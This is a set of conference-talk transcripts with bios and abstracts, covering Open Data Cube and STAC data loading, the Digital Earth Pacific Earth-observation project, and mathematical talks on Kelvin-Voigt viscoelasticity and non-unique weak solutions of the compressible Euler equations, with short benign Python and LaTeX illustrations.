really interesting is how the open data cube is starting to work with the STAC metadata standard. This is a metadata standard that's being used by lots of different Earth observation providers around the world, and at the moment the open data cube can effectively index from STAC documents, which are these JSON documents describing where data is located and how it's organized both in space and time. And that's really great, but that still means you have an open data cube that needs a database containing the location of all your data; that's what we call indexing. So the step that we want to take next is to separate that indexing process out of needing to load data, and what that really means is that when you come to use the open data cube you will be able to query existing STAC API implementations, such as those from Digital Earth Australia, Digital Earth Africa, Element 84, Microsoft's Planetary Computer, Planet, openEO and so many others, and you will be able to query that data directly; and once you've identified the data that you want to load, you will be able to just do that with the ODC without having to set up your own database. This is one of the major challenges for new users, and I'm sure anyone here who's attempted it has run into trouble with indexing, so we're really excited about this approach. It will really reduce the learning curve for using the open data cube, and means that you, or someone at your organization, will be able to set up an environment where you can load data without needing to worry about the database. So that's definitely something we're super excited about.
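The talk describes this database-free workflow as a next step; one way this pattern can be tried today is with the odc-stac package, which loads directly from a STAC API search. A minimal sketch is below; the endpoint, collection name, bounding box and band names are examples only and are not tied to any particular deployment mentioned above.

```python
# Minimal sketch of the "no local index" pattern described above, using odc-stac
# against a public STAC API. The endpoint, collection, area and bands are example
# values only; any STAC API with suitable collections could be substituted.
from pystac_client import Client
import odc.stac

catalog = Client.open("https://earth-search.aws.element84.com/v1")
items = catalog.search(
    collections=["sentinel-2-l2a"],
    bbox=[30.40, -26.60, 30.60, -26.40],       # lon/lat bounding box
    datetime="2021-01-01/2021-03-31",
).item_collection()

# Load the matching scenes straight into an xarray Dataset, with no database needed
ds = odc.stac.load(
    items,
    bands=["red", "green", "blue", "nir"],
    crs="EPSG:6933",
    resolution=10,
    chunks={},                                  # lazy loading with Dask
)
print(ds)
```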
So finally I'd like to introduce you all to our new chair for this year: Syed Rizvi is taking over from Alex Leith for the next year. Syed works at Analytical Mechanics Associates (AMA) in the US and currently supports the Committee on Earth Observation Satellites' Systems Engineering Office. He's previously played a significant role in the development of the African Regional Data Cube, which was the precursor to Digital Earth Africa, and he's really excited to be taking on this role, so we're very happy as a council to welcome him into it. So definitely, if you're interested in what the council is doing or our plans for the next 12 months, please speak to me or Alex or Syed during the conference, and any of the other presenters listed on the slides as well. I hope you have a wonderful time here at the conference. Thank you.
Caitlin Adams is a deeply creative thinker with a passion for solving the complex problems humanity faces. Working as a Data Scientist at FrontierSI, she looks for interesting ways to extract insights from Earth observation data and supports the community to do the same.
10.5446/54384 (DOI)
Hello, my name is Sachin and I work for the Geoscience, Energy and Maritime Division of the Pacific Community (SPC), based in Fiji. Thank you for this opportunity to talk about our Digital Earth Pacific initiative, which is derived from the existing Digital Earth Africa and Digital Earth Australia projects. To start off with some background: what is SPC? SPC is the principal scientific and technical organisation supporting sustainable development for our member countries and territories in the Pacific Islands. The division I work for, the Geoscience, Energy and Maritime Division, works in diverse areas such as maritime transport and boundaries, coastal geoscience, disaster risk, renewable energy and climate change. As you would note, most of these work areas have the potential to benefit widely from the Earth observation ecosystem, because during the pandemic we have not been able to deploy teams on the ground or to our member states, so a lot of work can be done remotely using satellite-based data. So what is Digital Earth Pacific? The project aims to support the development of operational Earth observation infrastructure that will take decades' worth of openly accessible satellite and remotely sensed data and use it to inform our member countries around challenges such as climate change, food security and disasters. We hope the solution will help us understand our environment and better prepare us for challenges such as sea level rise, disaster preparedness and response, and the potential impacts of weather and climate change. We hope that this product will empower our leaders and give them ready-to-use decision-making products, in order for them to make better decisions around sustainable development and fulfill their SDG requirements. The project is quite new; we only started earlier this year, in March, and over the last few months we have mostly been engaged in stakeholder consultation, with a wide range of stakeholders, to ensure that the products derived from DEP will be fit for purpose and will meet the development goals of our countries. As of this month we have run a number of workshops with our country stakeholders and are developing a roadmap based on their needs. On the technical side, we have also put some effort into standing up a prototype Open Data Cube for two pilot countries, mostly focused on indexing Sentinel data and the derived products. Based on the output from the prototype we will develop some early-win demonstration products for the countries, and then, based on the feedback, we will prepare a business case which will inform how the project goes forward in the future. So the current objectives over the last six months have been to understand the needs and priorities of our countries, look at some of the early-win cases we can tackle this year and what the immediate needs are, index data for a couple of countries and build some initial products, all of which will feed into the business case going forward. We are not working in isolation on this: we have engaged with the governments and the relevant ministries of four countries, two of which are high volcanic islands (Fiji and Vanuatu) and the other two atoll nations such as the Marshall Islands, because, as you would know, the challenges for atolls are quite different from those of the volcanic islands.

We have also involved academia through the University of the South Pacific, along with technical agencies on the other side, such as CSIRO, GA, the CEOS SEO and so on. Of the pilot countries we are working on right now, for Fiji the focus is mostly around agricultural monitoring, flooding, infrastructure, coastal change and water quality. A common issue that we have in the Pacific is the misconception that we do not have data for the region, when in fact there is a lot of open data available; a quick analysis shows the large volume of satellite data collected over the last decade for the region. However, the challenge we face is that these data are underutilized, both at the Pacific regional level and for in-country decision making, because of the lack of computing and internet infrastructure: it is not feasible to download gigabytes of tiles, bring them into a GIS environment and do analysis on top of that, because of the bandwidth restrictions. There is also a lack of awareness that these data exist, so there has been no investment in long-term infrastructure. The other big challenge on the technical side is cloud cover; we have very high cloud cover, especially over small atolls and islands. At the moment we are focused on Landsat and Sentinel-2, and of course Sentinel-1. Sentinel-1 is of particular interest to us because it can see down through the cloud to the surface. As an example of how much of an issue cloud cover is, you can see that for a particular area in Vanuatu, for both Sentinel-2 and Landsat 8 taken at around the same time, there are lots of clouds, whereas with Sentinel-1 you can see the roads and the agricultural fields easily; we don't have to worry about cloud cover. An analysis done by Dr Brian Killough from the CEOS Systems Engineering Office shows that for the same country in 2020 there is about six months of data missing or unusable because of cloud cover. The issue is compounded when you go down to the atoll level: for some of the smaller low-lying islands the data is essentially missing throughout the year. Sentinel-1, on the other hand, is always consistent for us and we can use it regardless of cloud. Hence we have received data from the CEOS SEO: COG-optimised, analysis-ready Sentinel-1 data for Fiji and Vanuatu, and this is what we have been indexing into our pilot cubes. So what are some of the applications we can build using the Sentinel-1 and Sentinel-2 data? Like I said, one of the major priorities for the two countries is agriculture monitoring. This is a quick example of sugarcane in Fiji, which is one of the primary exports; using NDVI we are able to track the growth of the cane, and you can see it is consistent with the harvesting period, which runs to about October. We want to extend this methodology to other crops, to species detection and also to monitoring pests. Another quick example is land cover change detection using NDVI and EVI from Landsat 8 and Sentinel-2, looking at change over a period of time. Another one is water body change detection and flooding; flooding is a major issue for our Pacific Island countries.

This is a very useful analysis for disaster response, to see the extent of a flood and the impact it would have on buildings. On illegal fishing, we did some experimentation in Vanuatu using SAR data for fishing vessel detection. The main issue we faced was with detecting vessels of less than around 14 metres, so more research is required in this area, but we were able to use the Sentinel-1 data to develop a strategy for detecting illegal fishing boats. The other common requirement that we get is coastal change detection. We are able to do that using Sentinel-2 and Landsat 8; however, one of the requirements for this kind of analysis is up-to-date ancillary data. We cannot always deploy survey teams in all the places where we want to do this kind of analysis, and the global models are too coarse for most purposes. This is why in-situ deployments of instruments are also important, to validate some of the coarser-resolution datasets, for example through the deployment of tide gauges. You can see on the south side of the island a settlement where about 80 people are being affected by sea level rise. Water quality is another area of interest: there are atolls and islands with reefs and lagoons, and we want to use the indices available to us to do water quality visualization (turbidity, chlorophyll, water colour and sediments), working with academia. Another project we are trying to fit into all this is around illegal extraction monitoring: we are trying to use methodologies such as NDVI, EVI and water quality indices to monitor identified areas, to see what the impacts of illegal extraction activities are, and then hopefully to implement long-term monitoring around these activities. So what is the status of the pilot cube at the moment? We have a deployment with Landsat and Sentinel-2 data indexed from 2014-2015 onwards, and we have received the SAR (Sentinel-1) data from the CEOS SEO, which is currently being indexed into the cube for Fiji and Vanuatu, covering all of the islands. We have equipped it with the existing Digital Earth notebooks and examples, and we are adapting these for the different use cases for Fiji and Vanuatu, so we don't have to start from scratch; we can take the lessons learned and products can be built quite quickly for our needs. We are not expecting our leaders and decision makers to use the notebooks as they are; instead we will make the products available through the infrastructure that has already been deployed within the countries, such as the GeoNode in Vanuatu, and an alpha deployment is being made available online as Digital Earth Pacific is developed. To summarize, we are quite confident that the Open Data Cube ecosystem, and the Sentinel-1 data in particular, has very high potential for a number of use cases in the Pacific. It can enable our leaders to make good decisions around forestry and agriculture, and to respond to some of the disasters such as volcanic eruptions, earthquakes and floods. Thank you.
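To make the water-extent idea above concrete, here is a minimal sketch of an NDWI-based calculation, assuming a dataset ds with green and nir bands already loaded from a data cube such as the pilot described here. The index choice and threshold are illustrative and are not the Digital Earth Pacific methodology.

```python
# Minimal sketch of an optical water-extent estimate, assuming an xarray Dataset
# `ds` with "green" and "nir" bands already loaded from an Open Data Cube.
# NDWI and the zero threshold are illustrative choices, not the DEP methodology.
import xarray as xr


def water_extent_km2(ds: xr.Dataset, pixel_area_m2: float = 10 * 10,
                     threshold: float = 0.0) -> xr.DataArray:
    """Approximate open-water area (km^2) per timestep using NDWI."""
    green = ds.green.astype("float32")
    nir = ds.nir.astype("float32")
    ndwi = (green - nir) / (green + nir)      # McFeeters NDWI
    water = ndwi > threshold                  # simple threshold classification
    # Count wet pixels per timestep and convert the count to square kilometres
    return water.sum(dim=("y", "x")) * pixel_area_m2 / 1e6


# Example usage: compare water extent before and after a flood event
# extent = water_extent_km2(ds)
# print(extent.to_series())
```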
Sachindra Singh is the Team Leader of the Geoinformatics Section, at the Geoscience, Maritime and Energy Division, Pacific Community (SPC). He has 15 years experience in geospatial-oriented systems and software engineering. A strong advocate of open source technologies for capacity building and sustainable development in developing countries, he has implemented robust decision-making tools and services based on geospatial and remotely-sensed data in the Pacific, both on regional and national levels. He has undertaken numerous capacity building exercises for on open source GIS/RS tools and systems in the Pacific Region, and currently is providing technical support for the Digital Earth Pacific (DEP) initiative within Pacific Community (SPC).
10.14288/1.0398186 (DOI)
What I am going to present is a model, and I will explain what it is. This is joint work with Kostas Koumatos, and with Corrado Lattanzio and Stefano Spirito, who are in L'Aquila. The most important ingredient for what I will talk about is an assumption going back to Andrews and Ball, which I will state in a moment, and the model is what I will call a Kelvin-Voigt model, because it combines elasticity and viscosity. Now, there are many contributions on such models in this community and in related theories, from people like Josef Malek and K. R. Rajagopal and their collaborators, and there are many variants that have been studied. The model I will discuss does have a thermodynamic structure behind it, but I will treat it here as a mathematical model, and if I have time I will say a little about that aspect. I come from the theory of conservation laws, so I will also say a little about the connection of this problem with those theories, and you will see that it is closely related to what we do. So this is a system of viscoelasticity: the stress has an elastic contribution, coming from the strain through a stored energy, and a viscous contribution coming from the gradient of the velocity. The important point is that the stored energy is not assumed to be convex, and we want to see what can be said for such theories. This is the system, and we are interested in its solutions. As everyone knows, it has an energy, with a kinetic and a potential part, and a dissipation coming from the viscosity, and the natural energy dissipation identity holds for these theories. Then one places some assumptions. There are coercivity assumptions, saying that the stored energy grows like a power p for large deformation gradients, and there are growth assumptions on its derivatives: they are bounded like powers, so the first derivative will be like F to the p-1 and the second derivative will be like F to the p-2. And somehow the focus of this work is to understand what the effect of the growth is on various issues for this problem. That is what we want to see, and I will tell you how.
The issue is the growth of the first derivative, that is of the stress, and how these bounds enter the analysis; I will try to say a little about what one can do in this direction. So, there is one more assumption, besides the assumptions that I call (H), which are the coercivity and the growth. There is the assumption, what is called the Andrews-Ball condition, which was introduced by Andrews and Ball, and which says that... Well, it can be written in various ways, but... I don't like the way it's written here. One second. Okay, the Andrews-Ball condition, as it was introduced, it's here — I should not have put that, this is a mistake, I should have put zero on the right-hand side. Okay, and what it is, it is a monotonicity of the stress function far away. So you allow non-convexity of W on compact sets, but when you are far away, you want your W to be convex and the corresponding S to be monotone. So I should have put a zero here for large values of F. So this is the Andrews-Ball condition. It was introduced in the context of the theory for dimension equal to one, and then Dolzmann and Friesecke exploited it in higher dimensions, in ways that I want to explain. Okay, so the existence theory that I want to explain is a combination of results, the first part related to the work of Dolzmann and Friesecke, and the second part is that, under the hypotheses (H) and the Andrews-Ball condition, if you have initial data v0 in L2 and F0 in Lp — p bigger or equal than 2 everywhere here — then you have a solution in the energy space and it decreases the energy. That's the first part. Second part: if you assume a little bit more, if you assume that F0 is in H1, then you have that the solution is in L infinity in time with values in H1. And here this is a weak solution which is almost like a strong solution, except that you don't know uniqueness for this problem; you would call it a strong solution if you knew uniqueness. And also, there are some conditions that are easy to work out under which you have conservation of energy: the energy is conserved in dimension 2 for all p's, and in dimension 3 for p between 2 and 4. All right, so let me explain a little bit this direction, and then I will go to the next thing. So Dolzmann and Friesecke, one thing that they did is that they approached this problem from the perspective of the methods of elasticity, trying to make contact with minimization methods. And they wrote down a minimization problem, which is a time-step type of problem: you start with your data and then you update the data by solving a minimization problem, and you get iterates that are continuous in x and discrete in t. And then you interpolate between these iterates. So what they solved is this problem here, for which of course you first have to make sure that you can solve it. And this provides a procedure to construct solutions for this problem.
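As I read the condition described here, together with the semiconvexity remark made a little later in the talk, the Andrews-Ball hypothesis can be recorded as monotonicity of the stress outside a compact set, say
\[
\big( S(F_1) - S(F_2) \big) : \big( F_1 - F_2 \big) \;\ge\; 0 \qquad \text{whenever } |F_1|,\,|F_2| \ge R,
\]
so that $W$ may fail to be convex on compact sets while $S = DW$ is monotone far away. As remarked below, this provides a constant $k$ such that $\widehat W(F) := W(F) + \tfrac{k}{2}|F|^2$ is convex, i.e. $D^2W + k\,\mathrm{Id} \ge 0$, and this is also what makes a quadratic time-step penalty convexify the incremental problem: for a step $\tau \le 1/k$, a functional of the schematic form
\[
F \;\mapsto\; \int \Big( W(F) + \frac{1}{2\tau}\,\big|F - F^{n-1}\big|^2 \Big)\,dx
\]
has a convex integrand, since its Hessian is $D^2W + \tfrac1\tau\,\mathrm{Id} \ge \big(\tfrac1\tau - k\big)\mathrm{Id} \ge 0$. The specific functional here is only my schematic guess at the kind of minimization step described, not the exact one from the slides.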
The constraint is affine, so what you need is convexity of this function, and it turns out to be convex for a reason that I will say in a moment. Then you build approximate solutions. Then the main thing is that they proved a propagation-of-compactness result, which says that if the approximations of the initial data converge strongly to F0, then this property propagates in time: from strong convergence of the initial data you get strong convergence later. Now — okay, I will not explain how they did that, but there is some kind of estimate for differences of solutions that they had to work out. But one thing I want to say is that the hypothesis of Andrews and Ball is equivalent to saying that the function W, if you add a quadratic, becomes convex: although the function is non-convex, if you add the quadratic it becomes convex. So this is what is sometimes called semi-convexity. Now, our perspective was to do Galerkin approximations and estimates. And the main thing is that there is an estimate on the gradient, which you could have guessed because of the result of Dolzmann and Friesecke. There is an identity that looks like that, which I will explain in the next slide; under the condition that this quantity here — W hat, which is the original W plus k times the quadratic — is convex, it gives you a Gronwall inequality and it gives you an H1 estimate. So, okay, how can you see that? One way to think of it is to think of a classical issue in the theory of conservation laws. Namely, if you consider a viscosity approximation of a conservation law, of course you get the energy identity, and it is known since the work of DiPerna in 1983 — his work on existence for the 1D case of the p-system, or the equations of elasticity if you want — that one part of the proof is to transfer the dissipation from the velocity to the strain. Okay, and something similar occurs in relaxation approximations: you can transfer dissipation and get positive dissipation under the subcharacteristic condition there. And it can be done also in this multi-D case by coming up with this kind of estimate, which is an exact estimate for the problem, and which you obtain by combining the energy estimate with another estimate that again has indefinite dissipation; but if you add them together, you can make the dissipation positive for problems that are hyperbolic, which means that the stored energy is convex. So for those problems this is what happens. And for the case that we are interested in here, which corresponds to the case epsilon equal to 1, you don't quite get that, but what it tells you is that, since you have the Andrews-Ball condition, you can put a gradient there on the right-hand side, then get something positive, get the Gronwall inequality that I mentioned, and then conclude. All right, so this is the main thing in order to do this part, this kind of estimate. Let me — okay, I wanted to talk about diffusion-dispersion approximations, but let me skip that. And I want to talk about an example. You know, this tells you to consider what happens if you don't have strong convergence of the initial data. And it is possible to construct an example in one space dimension showing that if the initial data only converge weakly, then you can have solutions that are oscillatory. And this example is easy to construct if you use two ingredients.
One is the uniform shear solutions, which are known to be what are called universal solutions in elasticity; namely, no matter what σ(u) is, this will be a solution for any k. And you mix that together with the following observation for this kind of system, which goes back to works of Pego and of Hoff: these kinds of systems can have discontinuous solutions of the following type. If you write down the Rankine-Hugoniot conditions, you see that if you set the jump of v equal to zero, which means that the velocity is continuous, and you want to have a discontinuity in v sub x, then necessarily, if you want a discontinuity in u, you have to pick the speed s to be equal to zero, and then you can have solutions where u is discontinuous and the total stress is continuous, but with u and v sub x having discontinuities. So if you do that and you combine it with the uniform shear solutions, it is easy to construct oscillatory solutions that oscillate between two states A and B: u would be A times t on the interval from zero to theta and B times t from theta to one, and then you extend periodically, as usual in these examples, and you construct the oscillating solution by rescaling. In order to achieve that, you need a special stress, which you can devise, and this construction works for some time interval, but σ has to be non-monotone. Okay, that's the catch. So, if you want, this kind of example is one that would appear in phase transitions; and then, by rescaling this solution, you get that v_n converges strongly, but u_n only converges weakly at all times, so the initial oscillations propagate in time. Okay, all right. Now let me just mention very briefly the uniqueness and regularity, and I will cut it there. So in dimension two, with F0 in H1, and using a strengthened variant of the Andrews-Ball condition — which essentially says that the convexity of W tilde, the function obtained after adding the quadratic, is bounded from below by a power F to the p minus 2 — there exists a unique weak solution. You can prove uniqueness, and this is a result which is similar in pattern to the Yudovich result for the Euler equations with bounded vorticity. Okay, then there are some regularity results. This kind of system has some structure: you can take derivatives and estimate the terms together. Let me not go into that, but in any case there are regularity estimates in H3 under the Andrews-Ball condition, or the modified Andrews-Ball condition, for various values of p. All right, so I think I'm running out of time, so I will not talk about that; but since I happen to be the last speaker before the organizers speak, I can, on behalf of everybody here, express our thanks to Miroslav Bulíček and Agnieszka Świerczewska-Gwiazda for putting together this conference and providing us with an outlet for scientific exchange. Thank you. Thank you.
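In symbols, the jump conditions used in the oscillatory example above are the following; this is a reconstruction for the one-dimensional system $u_t = v_x$, $v_t = (\sigma(u)+v_x)_x$ that appears to be meant here, so the exact form of the system is an assumption.
\[
-s\,[u] = [v], \qquad -s\,[v] = [\sigma(u) + v_x].
\]
If the velocity is continuous, $[v]=0$, then a genuine jump $[u]\neq 0$ forces $s=0$, and the second condition reduces to continuity of the total stress $\sigma(u)+v_x$, while $u$ and $v_x$ jump; these stationary discontinuities are what get combined with the uniform shear solutions.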
We consider the Kelvin-Voigt model for viscoelasticity and prove propagation of $H^1$-regularity for the deformation gradient of weak solutions in two and three dimensions assuming that the stored energy satisfies the Andrews-Ball condition, in particular allowing for a non-monotone stress. By contrast, a counterexample indicates that for non-monotone stress-strain relations (even in 1-d) initial oscillations of the strain lead to solutions with sustained oscillations. In addition, in two space dimensions, we prove that the weak solutions with deformation gradient in $H^1$ are in fact unique, providing a striking analogy to the 2D Euler equations with bounded vorticity.
10.14288/1.0398132 (DOI)
So: non-uniqueness of admissible weak solutions to the compressible Euler equations with smooth initial data. Yeah, so thanks, Eduard, and thanks to the organizers for inviting me to this workshop. It's a pity that we cannot meet in Banff, but okay, I hope that we meet there again someday. So this workshop should be about complex fluids, so I apologize that my talk is not really about complex fluids. But at least I'm glad that Alexis spoke ahead of me and was also not really on the topic, so I don't feel that bad. Yeah, so my system of equations is also a very simple one. It's the compressible isentropic Euler system in 2D space. Here the unknowns are the density and the velocity of the fluid, and the pressure which appears here is a given function of rho; throughout my talk the pressure will actually be rho squared. But that doesn't mean that the results I will be speaking about do not hold for other pressures — they hold for other power-law pressures as well. So this is just a choice for simplicity. And yeah, so this is a hyperbolic system of conservation laws. And as you may know, the existence theory for hyperbolic systems of conservation laws is still quite open, and there are satisfactory results only in the case of systems in 1D or of a single equation in several space dimensions. However, as you see, I will be talking about a system in multiple space dimensions, and there the existence theory still has some gaps. But in particular, already for an equation as simple as the Burgers equation it is well known that hyperbolic equations do not need to have unique solutions, and some additional conditions have to be imposed in order to select a unique solution. So in our case as well, we will talk about admissible solutions. These will be solutions that satisfy this sort of energy inequality, which in the terminology of hyperbolic systems of conservation laws is actually the entropy inequality, because this quantity here, which is the total energy of the system, plays the role of the mathematical entropy. So here this epsilon of rho is related to the pressure through this formula. Okay, so the whole content of my talk stems from the results of Camillo De Lellis and László Székelyhidi. Following their groundbreaking works in 2009 and 2010, there appeared a whole tree of various results related to theirs, and I had the privilege to be involved in a couple of branches of this tree. And one of the branches is actually the following. Already in their second paper on the topic, in 2010, they showed that there exist initial data for the compressible Euler system, rho zero and v zero, which are just bounded, such that there are infinitely many bounded admissible solutions. So this in particular suggests that the admissibility condition — the energy inequality or entropy inequality, if you wish — does not play the same role as, for example, in one dimension, and it is not enough to select a unique solution. So this was for initial data in L infinity. And then came the question of how regular the initial data can be in such a way that this ill-posedness appears.
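For concreteness, the system and the admissibility inequality being described can be written as follows, for $p(\rho)=\rho^2$ and under one common normalization of the internal energy (the normalization is my assumption):
\[
\partial_t \rho + \operatorname{div}_x(\rho v) = 0, \qquad \partial_t(\rho v) + \operatorname{div}_x(\rho v\otimes v) + \nabla_x p(\rho) = 0, \qquad p(\rho)=\rho^2,
\]
with $p(\rho)=\rho^2\varepsilon'(\rho)$, so here $\varepsilon(\rho)=\rho$, and admissible solutions are required to satisfy, in the sense of distributions,
\[
\partial_t\Big(\rho\varepsilon(\rho)+\tfrac12\rho|v|^2\Big) + \operatorname{div}_x\Big[\big(\rho\varepsilon(\rho)+\tfrac12\rho|v|^2+p(\rho)\big)\,v\Big] \le 0 .
\]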
The next step was due to Elisabetta Chiodaroli and also Eduard Feireisl, who showed in 2014 that you can actually have a regular density rho zero in C1 and find an irregular initial velocity v zero, which is still just L infinity, in such a way that you get essentially the same result, which is ill-posedness of bounded admissible solutions. And then, together with Elisabetta Chiodaroli and Camillo De Lellis, we have shown that you can actually have Lipschitz initial data, rho zero and v zero, such that you still have the same result: infinitely many bounded admissible solutions. So at this point you may say, okay, well, this is weird, because we have weak-strong uniqueness, which holds here. And you would be right. The point is that weak-strong uniqueness holds only on the finite time interval on which the strong solution exists. Once the strong solution fails to exist and some discontinuity appears, then of course you don't have weak-strong uniqueness anymore, and actually you can show that there may exist infinitely many weak solutions starting from the same initial data, which is exactly what is written here in our theorem from 2015. So we have shown that there exist Lipschitz initial data such that there are infinitely many bounded admissible weak solutions. However, these solutions are all locally Lipschitz on some finite interval of time, on which they all coincide with the unique classical solution. So our proof was based on the analysis of the Riemann problem and a suitable application of the theory of Camillo and László, which was developed originally for the incompressible Euler equations. So what is the Riemann problem? I just recall that the Riemann problem is a special type of initial value problem where the initial values are piecewise constant: for negative x2 we have a pair of constants rho minus and v minus, and for positive x2 we have another pair of constants rho plus and v plus, and we call these the Riemann initial data. As you can see, these initial data are one-dimensional — they depend only on x2 and not on x1. And you can use the 1D theory, which is well established, to show that there exist self-similar solutions to this Riemann problem, which are of course all one-dimensional and actually depend only on the single variable x2 over t. But of course you may ask whether you also have other solutions which are not one-dimensional, and the answer is that, for certain values of these constants, you indeed have other solutions as well. So here is our main theorem, from our joint paper with Elisabetta Chiodaroli, Václav Mácha and Sebastian Schwarzacher, which says the following: we can actually have, as was hinted in the title of the talk, initial data which are C infinity such that there exist infinitely many bounded admissible weak solutions to the Euler system. There is a slight catch here, because we cannot prove — or at least we did not succeed in proving — that these solutions are global in time, so our solutions are defined on a time interval between 0 and some capital T plus delta zero, where this capital T is the time of existence of the unique smooth solution which starts from this initial data.
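Explicitly, the Riemann initial data described above are
\[
(\rho_0, v_0)(x) \;=\; \begin{cases} (\rho_-, v_-), & x_2 < 0,\\ (\rho_+, v_+), & x_2 > 0,\end{cases}
\]
and the classical one-dimensional theory yields self-similar solutions depending only on the variable $x_2/t$.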
So essentially what happens is that at time capital T the smooth solution, which is unique, develops a discontinuity, and you can continue this solution in a highly non-unique way — but, at least as far as we can prove, only for a short period of time of length delta zero. So what are the ideas of our proof? The idea is the following. We have the theorem with Lipschitz data, with the Riemann data there, and the idea there was to take Riemann data which are generated by a compression wave. The compression wave is Lipschitz, and therefore of course that result worked for Lipschitz initial data, and we know that for these data we have infinitely many weak solutions. So the idea is somehow natural: we smooth out the compression wave and see what happens. And indeed this yields a sort of generalized Riemann problem, where you no longer have piecewise constant data at the time of the discontinuity, and therefore you have to generalize the proof, introduce some generalized definitions of subsolutions and so on, and calculate a lot; but in the end you can use the key convex integration lemma from De Lellis and Székelyhidi to show that, to prove the existence of infinitely many admissible weak solutions, it is enough to find a single admissible fan subsolution, where of course the subsolution is an object which is suitably defined. Okay, so of course I don't have time to go through the whole proof here, so I will just speak about what was, for me at least, the more fun part of the proof, which was actually the first part: how to construct a compression wave which is C infinity instead of Lipschitz, in order to make the proof work — because the convex integration part is then somewhat technical and not really that interesting. So what is a smooth compression wave? Here we use the well-known relation between the Euler equation and the Burgers equation, namely the fact that if we take one function here, called w1, which I think is called a Riemann invariant, and we take it to be constant, then another quantity, called here lambda1, which is a characteristic speed of the Euler equations, solves the Burgers equation. And the point is that if you have smooth solutions to Burgers and you take this w1 to be constant, then of course you produce smooth solutions to the Euler equations, and in particular, since these are smooth objects, they satisfy the energy inequality with an equality sign, so there is no problem there. So this is what we call the compression wave — I mean, the simple picture: you have two states, lambda minus, which is bigger than lambda plus, and they are connected by a straight line, so you can see that this guy is Lipschitz and not smoother, due to these points here and here. And if you let this evolve through the Burgers equation, you know that at a certain finite time, which is given by the slope of this line, you develop a discontinuity between lambda minus and lambda plus.
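The relation to Burgers that is used here can be made explicit for $p(\rho)=\rho^2$; up to the indexing convention of the slides, the computation is the following sketch. The Riemann invariants and characteristic speeds of the one-dimensional isentropic system are
\[
w_\pm = v \pm 2\sqrt{2\rho}, \qquad \lambda_\pm = v \pm \sqrt{2\rho},
\]
and each $w_\pm$ is transported with speed $\lambda_\pm$. On solutions with, say, $w_- \equiv \text{const}$ one has $\lambda_+ = \tfrac14\,(3w_+ + w_-)$, an affine function of $w_+$, so the characteristic speed itself solves the Burgers equation
\[
\partial_t \lambda_+ + \lambda_+\,\partial_x \lambda_+ = 0 ,
\]
and smooth decreasing data for $\lambda_+$ give a compression wave that breaks down in finite time.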
So what we need to do is to smooth this out, so we introduce the initial data, which will in the end be the initial data for our Euler equations, as written here. Maybe instead of looking at this formula for a long time, I can show you the picture of what happens: you keep the shape, but instead of these corners, which were not smooth, you introduce some smooth functions, which I call here f0 minus and f0 plus, which of course are such that what you create here is C infinity. So that's the idea of how to proceed, and then the question of course is what happens if you let this evolve through the Burgers equation again. And the point is that at time t equals capital T a discontinuity again appears, and the solution at the time capital T looks like this — where again I can simply show you the picture of how it looks: you have a jump here between these two values, and there are neighborhoods of this point on the left and on the right where you have some functions which, okay, I call here, inaccurately, f0, but f0 will be a slightly different thing in a moment. So essentially the question now was how these functions in the neighborhood of the discontinuity look, and the answer is that one type of function which you can get there is this one: if you take the function written here, 1 minus 2 over pi times the arctangent of log x, then you can use this function to construct, backwards somehow, C infinity initial data. So the lemma is here, and again it is maybe a little bit technical, but what you can see is that you use this function f0, which is this 1 minus 2 over pi arctangent of log x, and the lemma says that if you have these functions on a neighborhood of the discontinuity, then there exist initial data which are C infinity, which produce solutions to the Burgers equation that are C infinity up to the time T, and at time capital T the solution to Burgers has the form that was written before. So this was a good function to look for, and this function has all the good properties we need. This may be a well-known property somewhere, but we were looking for it in the literature and were not able to find examples of such functions, and we had to sort of figure out ourselves how to do it; and as I said, this was the more fun part of the proof, to actually find this, because what we needed later in the proof was indeed to know exactly how the function behaves around this discontinuity. So now we know that, using the Burgers equation, we can use our nice function which is written here. And then, okay, let's go back to the ideas of the proof. So we now have our smooth compression wave, and we end up at the time t equals capital T with a sort of generalized Riemann problem. This is the problem where you already have the discontinuity, and you ask yourself how to proceed further with solutions to the Euler equations, and here comes the part where you use this convex integration stuff. So just briefly, because I will run out of time in like three minutes: first of all, instead of the velocity we use the momentum here, but this is not really a big issue, because all the way through the paper we always assume that the density is bounded from below by some constant, so this is not really an issue. And we introduce, first of all, something which is called a generalized fan partition of our space-time.
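In symbols, the fan partition that is described next can be written, schematically, as
\[
P_- = \{\, (x,t) : x_2 < \tilde\nu_-(t) \,\}, \qquad P_1 = \{\, (x,t) : \tilde\nu_-(t) < x_2 < \tilde\nu_+(t) \,\}, \qquad P_+ = \{\, (x,t) : x_2 > \tilde\nu_+(t) \,\},
\]
with $\tilde\nu_-(t) < \tilde\nu_+(t)$ two curves emanating from the discontinuity at time $T$; the convex integration will take place in the middle region $P_1$. The precise form follows the talk's notation and is otherwise a sketch.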
So the generalized fan partition consists of three sets. Essentially what we do is we split our space-time, starting from the time where we have the discontinuity, into three regions: one of the regions is P minus and another one is P plus, which are here, and they are separated by curves which are functions of time here; these nu minus tilde and nu plus tilde define the generalized fan partition. And then, using this fan partition, we introduce something which is called a generalized fan subsolution. I will not go through the details here, but it is a piecewise continuous, or piecewise differentiable, object which has jumps across these curves. So actually what happens is that the fan subsolution coincides with the solution to the Euler equations in this P minus region and in this P plus region, it has a jump discontinuity across these curves, and here in this region P1 it is some object which we called a strict subsolution, which satisfies a relaxed version of the Euler equations, written here, together with some pointwise inequality between these functions mu and rho and C, which are all parts of the generalized fan subsolution. And then the rest of the story is simple, yeah — and moreover, of course, you need to define the subsolution to be admissible if you want to end up with admissible solutions to Euler — and then the rest of the story is simply to find the admissible fan subsolution, because the work of De Lellis and Székelyhidi tells you that if you find just one subsolution, then you have infinitely many solutions. And yeah, after a lot of technical work you can indeed do that and find the admissible fan subsolution with the initial data I told you about before, which are generated by the smooth compression wave, and you end up with the result. And that is actually the end of my talk, so thank you for your attention. Thanks a lot, Ondřej.
We consider the isentropic Euler equations of gas dynamics in the whole two-dimensional space and we prove the existence of a $C^\infty$ initial datum which admits infinitely many bounded admissible weak solutions. Taking advantage of the relation between smooth solutions to the Euler system and to the Burgers equation we construct a smooth compression wave which collapses into a perturbed Riemann state at some time instant $T > 0$. In order to continue the solution after the formation of the discontinuity, we adjust and apply the theory developed by De Lellis and Székelyhidi and we construct infinitely many solutions.
10.14288/1.0398189 (DOI)
